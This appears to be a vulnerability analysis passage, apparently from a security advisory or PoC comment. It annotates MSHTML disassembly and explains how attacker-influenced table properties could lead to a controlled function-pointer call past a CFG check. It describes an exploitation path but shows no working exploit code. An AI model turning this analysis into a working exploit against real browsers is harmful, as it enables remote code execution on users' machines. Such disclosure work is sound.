+00007ffe`8f330a62 e8793c64ff      call    MSHTML!Layout::Patchable<Layout::PatchableArrayData<Layout::MultiColumnBox::SMultiColumnBoxItem> >::Readable (00007ffe`8e9746e0)
+00007ffe`8f330a67 488b30          mov     rsi,qword ptr [rax]
+00007ffe`8f330a6a 488b06          mov     rax,qword ptr [rsi]
+00007ffe`8f330a6d 488bb848030000  mov     rdi,qword ptr [rax+348h]
+00007ffe`8f330a74 488bcf          mov     rcx,rdi
+00007ffe`8f330a77 ff155b95d700    call    qword ptr [MSHTML!_guard_check_icall_fptr (00007ffe`900a9fd8)]
+00007ffe`8f330a7d 488bce          mov     rcx,rsi
+00007ffe`8f330a80 ffd7            call    rdi
+
+On 00007ffe`8f330a51 rxc is read from rbp and MSHTML!Layout::Patchable<Layout::PatchableArrayData<Layout::MultiColumnBox::SMultiColumnBoxItem> >::Readable is called which sets up rax. rcx is supposed to point to another object type, but in the PoC it points to an array of 32-bit integers allocated in Array<Math::SLayoutMeasure>::Create. This array stores offsets of table columns and the values can be controlled by an attacker (with some limitations).
+
+On 00007ffe`8f330a59 the crash occurs because rax points to uninitialized memory.
+
+However, an attacker can affect rax by modifying table properties such as border-spacing and the width of the firs th element. Let's see what happens if an attacker can point rax to the memory he/she controls.
+
+Assuming an attacker can pass a check on line 00007ffe`8f330a59, MSHTML!Layout::Patchable<Layout::PatchableArrayData<Layout::MultiColumnBox::SMultiColumnBoxItem> >::Readable is called again with the same arguments. After that, through a series of dereferences starting from rax, a function pointer is obtained and stored in rdi. A CFG check is made on that function pointer and, assuming it passes, the attacker-controlled function pointer is called on line 00007ffe`8f330a80.
+-->